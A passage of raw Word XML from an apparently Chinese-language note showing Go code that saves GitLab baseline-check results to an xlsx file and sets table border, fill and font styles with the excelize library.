        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v.RejectUnverifiedEmailPush,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3238D204" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>v.RejectCommitUnverifiedPush,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DDBAAC" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4F3372" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="627589E2" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_Project, name, &amp;single_project)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52378B7A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EEA222" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CED1E2" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1156BBA6" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47697C09" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C84FF8" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>// ----------------------Save to a xlsx----------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B0A9C0" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B6CD742" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err := f.SaveAs("gitlab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基线检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.xlsx"); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098AD4C6" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E116295" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22904C51" w14:textId="6BFFBFE0" w:rsidR="00F95BE2" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CC81E4" w14:textId="77777777" w:rsidR="00F95BE2" w:rsidRDefault="00F95BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="499E8C41" w14:textId="778F57C9" w:rsidR="00F27E96" w:rsidRDefault="00F27E96" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置表格样式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5127B02E" w14:textId="7A9EBFC8" w:rsidR="00F27E96" w:rsidRDefault="00F27E96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37304B27" w14:textId="56022052" w:rsidR="00F27E96" w:rsidRPr="00F27E96" w:rsidRDefault="00CB0E94" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0E94">
        <w:t>https://blog.csdn.net/weixin_41546513/article/details/121243485</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049FBFBB" w14:textId="4EADBF48" w:rsidR="00F95BE2" w:rsidRDefault="00F95BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A900917" w14:textId="7D81499F" w:rsidR="00DA6BD0" w:rsidRDefault="00DA6BD0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十六颜色对照表：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BD0">
        <w:t>https://www.sioe.cn/yingyong/yanse-rgb-16/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2908E32E" w14:textId="77777777" w:rsidR="00DA6BD0" w:rsidRPr="00CB0E94" w:rsidRDefault="00DA6BD0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C356DC5" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>a := excelize.Style{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C0F69C" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Border: []excelize.Border{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC1828E" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BA7127" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Type:  "right",   // top bottom left right diagonalDown diagonalUp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的一个</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0293D0C5" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Color: "#000000", // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十六进制的颜色编码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBCC2BF" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Style: 2,         // 0-13 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有对应的样式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13880789" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6495DDC5" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6469C7F3" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Type:  "left",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49289902" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Color: "#000000",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3582B280" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Style: 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7206AAFE" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DAD1F5" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B544E5" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Type:  "top",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A20FB6E" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Color: "#000000",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5A768F" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Style: 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8356B7" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA2939B" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24057528" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Type:  "bottom",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006C3CD4" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Color: "#000000",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53663475" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Style: 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F74320" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D6E0AB" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}, Fill: excelize.Fill{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7875C2E1" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Type: "gradient", // gradient </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渐变色</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    pattern   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>填充图案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C22BDF" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// Pattern: 1,                   // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>填充样式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当类型是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> pattern 0-18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>填充图案</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实体填充</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C19E6D9" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// Color:   []string{"#FF0000"}, // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Type = pattern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，只有一个</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B9EEB1" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Color:   []string{"#00F700", "#00F700"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1006F0AB" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Shading: 1, // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> gradient </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0-5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>横向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每种颜色横向分布</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>纵向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对角向上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对角向下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有外向内</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由内向外</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754B870A" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}, Font: &amp;excelize.Font{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D88904D" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Bold: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B14DBFA" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// Italic: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A47BEFD" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// Underline: "single",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D76E075" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Size:   14,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248D953D" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Family: "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宋体</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A3097E" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// Strike:    true, // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除线</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B019CB" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
